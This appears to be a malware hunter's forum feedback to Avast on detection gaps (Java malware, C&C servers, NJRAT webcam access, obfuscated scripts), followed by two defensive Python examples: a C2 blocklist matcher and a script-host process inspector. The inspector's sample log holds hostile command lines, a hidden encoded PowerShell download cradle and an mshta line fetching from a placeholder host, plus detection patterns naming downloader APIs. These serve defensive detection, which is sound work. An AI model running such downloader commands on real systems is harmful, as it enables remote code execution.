Hi,
I am a malware hunter and I’ve been experimenting with Avast recently.
It offers great malware protection, but I’ve noticed several glitches and areas of improvement:
Java Malware:
Avast is one of the few vendors blocking Java malware effectively, but real-time protection doesn’t block *.jar files as soon as they are created. Unless you right-click-scan the item, malware gets blocked by IDP seconds after opening, even though there is a detection in definitions. This looks like a scanning glitch.
C&C Servers:
Avast hasn’t developed technology that blocks connection to known C&C servers. Web Shield blocks dangerous downloads and phishing, but all other connections are allowed. This may be a great area of improvement.
I’m sure you have a database of known C&C servers and it won’t be too hard for you to extract them from malware during analysis. It will boost your protection to unprecedented levels.
Correction:
There is an option for blocking known C&C servers in settings, but it doesn’t look very effective. I tried many RATs connecting mainly to domains *.hopto.org, some of them months old and they are still not blocked.
Ransomware Protection:
It would’ve been great to be able to select different modes for different folders, instead of just selecting one mode in general.
Extracting domains from malware and analysing relationships on VT might be a good idea.
Webcam Protection:
I was experimenting with NJRAT (downloading pre-built servers) and several times I had attackers connected. They could turn on my webcam, so I suggest you download some RATs and test/fix this.
Scripts, fileless malware:
This is a bit hit and miss (it tends to be effective, with minor exceptions). I suggest you have a look at tools such as Invoke-Obfuscation Master as well as maldocs and develop generic methods to block downloaders and droppers, especially when they abuse common Windows processes (wscript, cscript and others) and are obfuscated.
Removal:
I noticed sometimes removed malware remains in memory (that happened with NJRAT servers again). I think the way you terminate processes should be improved.
Otherwise, due to the IDP I believe, you have great correlation and remove malware in its entirety, unlike many others. I tested your ability to remove scheduled tasks with malicious PowerShell code and you did great.
Firewall:
Firewall doesn’t seem to scan programs for viruses before allowing them to connect, as on my test it allowed threats for which it had a detection. It would be a good idea not to allow known malware to connect, as well as maybe a “hardened mode”, where all untrusted executables are blocked from connecting.
As a side note, I sent you some pretty interesting samples days ago and they are still undetected. I sent you a JPHP Coinminer and a Python Stealer, which I discovered myself. At the time of sending, they had very low detection (only Kaspersky, ZoneAlarm indirectly and one more). I was expecting you to take them more seriously, but there is no detection to date.
It could’ve made a great article.
A GData analyst has already published an article on the samples I discovered: https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp
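The C&C point above (known servers, including RATs on dynamic-DNS domains such as *.hopto.org, still being allowed to connect) comes down to how a blocklist is matched. The following is an added example, not Avast's or the poster's code: a small outbound-connection checker where a wildcard entry covers every subdomain of a dynamic-DNS parent, so that a RAT given a fresh subdomain under the same parent is still caught. The blocklist entries, the connection list and the `c2.evil-rat.example` / 198.51.100.7 indicators are constructed placeholders.

```python
"""Blocklist matching for outbound connections (added example, not Avast's code).

A wildcard entry such as '*.hopto.org' covers every subdomain of the
dynamic-DNS parent, because RAT builders hand out fresh subdomains under
the same parent faster than exact hostnames can be listed.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class BlockRule:
    pattern: str   # exact host/IP, or '*.parent' for all subdomains of parent
    reason: str


# Constructed sample blocklist. 'c2.evil-rat.example' and 198.51.100.7 (an
# RFC 5737 documentation address) are placeholders, not real indicators.
BLOCKLIST = [
    BlockRule("*.hopto.org", "dynamic-DNS parent abused by RAT builders"),
    BlockRule("c2.evil-rat.example", "C2 host extracted from sample config"),
    BlockRule("198.51.100.7", "hard-coded C2 address"),
]


def normalize(host: str) -> str:
    """Lower-case, strip whitespace and a trailing root dot ('a.example.' == 'a.example')."""
    return host.strip().rstrip(".").lower()


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def matches(rule: BlockRule, host: str) -> bool:
    host = normalize(host)
    pat = normalize(rule.pattern)
    if pat.startswith("*."):
        # Wildcard rules match subdomains only: the apex (hopto.org itself) is
        # the provider's own site, and an IP literal never matches a domain wildcard.
        return not is_ip_literal(host) and host.endswith(pat[1:])
    return host == pat


def lookup(host: str, rules=BLOCKLIST) -> Optional[BlockRule]:
    """First rule that matches the destination, or None if it should be allowed."""
    for rule in rules:
        if matches(rule, host):
            return rule
    return None


# Constructed outbound-connection events: (process image, destination, port).
SAMPLE_CONNECTIONS = [
    ("C:\\Users\\Public\\server.exe", "victim123.hopto.org", 5552),
    ("C:\\Program Files\\Browser\\browser.exe", "www.example.com", 443),
    ("C:\\Users\\Public\\server.exe", "198.51.100.7", 1604),
]


def filter_connections(conns, rules=BLOCKLIST) -> List[Tuple[str, str, str]]:
    """Return (destination, 'block'|'allow', reason) for each connection event."""
    decisions = []
    for _image, host, _port in conns:
        rule = lookup(host, rules)
        if rule is not None:
            decisions.append((host, "block", rule.reason))
        else:
            decisions.append((host, "allow", ""))
    return decisions


if __name__ == "__main__":
    for host, verdict, reason in filter_connections(SAMPLE_CONNECTIONS):
        print(f"{verdict:5} {host} {reason}")
```

The design choice worth noting is the wildcard semantics: `*.hopto.org` deliberately does not match `hopto.org` (the provider's website) and does not match look-alike hosts such as `hopto.org.example.net`, because the suffix comparison includes the leading dot.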
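The scripts and fileless-malware section asks for generic detection of downloaders and droppers that abuse wscript, cscript and similar hosts rather than per-sample signatures. As an added example (not Avast's or the poster's code), here is a small inspector that scores process-creation events for those script hosts on behavioural indicators: an Office parent process, an encoded or hidden-window PowerShell command, an engine override on wscript/cscript, inline script passed to mshta, download-capable API names, and a high-entropy argument string of the kind obfuscation tools produce. The tab-separated log format, the PIDs, paths and the base64 blob are constructed for the example, and the entropy threshold is an assumption.

```python
"""Script-host process inspection (added example, not Avast's code).

Scores process-creation events for script hosts using generic indicators of
downloader/dropper behaviour instead of per-sample signatures.
"""
import math
import re
from collections import Counter
from typing import List, NamedTuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# (indicator name, regex applied to the argument string of the command line)
ARG_PATTERNS = [
    ("encoded-command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden-window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("downloader",      re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|xmlhttp|bitsadmin", re.I)),
    ("inline-script",   re.compile(r"\b(?:javascript|vbscript):", re.I)),
    ("engine-override", re.compile(r"//e:\w+", re.I)),   # wscript //E:jscript file.txt
]


class Finding(NamedTuple):
    pid: int
    image: str
    indicators: tuple


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def inspect_event(pid: int, parent: str, image: str, cmdline: str) -> List[str]:
    """Return indicator names for one event; empty list when nothing is suspicious."""
    if basename(image) not in SCRIPT_HOSTS:
        return []
    parts = cmdline.split(None, 1)
    args = parts[1] if len(parts) > 1 else ""
    found = [name for name, rx in ARG_PATTERNS if rx.search(args)]
    if basename(parent) in OFFICE_PARENTS:
        found.append("office-parent")   # maldoc spawning a script host
    # Assumed threshold: long, high-entropy argument strings are typical of
    # obfuscator output, while plain script paths sit well below it.
    if len(args) >= 40 and shannon_entropy(args) > 4.8:
        found.append("high-entropy-args")
    return found


# Constructed tab-separated process-creation log (header row first).
# PIDs, paths, the .invalid URL and the base64 blob are made up for the example.
SAMPLE_LOG = """\
pid\tparent\timage\tcmdline
3311\tC:\\Windows\\System32\\svchost.exe\tC:\\Windows\\System32\\cscript.exe\tcscript.exe //nologo C:\\Scripts\\inventory.vbs
4120\tC:\\Program Files\\Microsoft Office\\WINWORD.EXE\tC:\\Windows\\System32\\wscript.exe\twscript.exe //E:jscript C:\\Users\\Public\\inv.js
5008\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA
6110\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\mshta.exe\tmshta.exe javascript:a=new ActiveXObject("Msxml2.XMLHTTP");a.open("GET","http://payload.invalid/x");
"""


def scan_log(text: str) -> List[Finding]:
    """Parse the TSV log and return one Finding per script-host event with indicators."""
    findings = []
    for line in text.strip().splitlines()[1:]:   # skip the header row
        pid, parent, image, cmdline = line.split("\t")
        inds = inspect_event(int(pid), parent, image, cmdline)
        if inds:
            findings.append(Finding(int(pid), basename(image), tuple(inds)))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.pid, f.image, ", ".join(f.indicators))
```

The benign scheduled-task line (cscript running a plain .vbs under svchost) produces no finding, which is the point of scoring behaviour rather than the host binary itself: the same wscript.exe is fine from a logon script and suspicious when Word spawns it with an engine override.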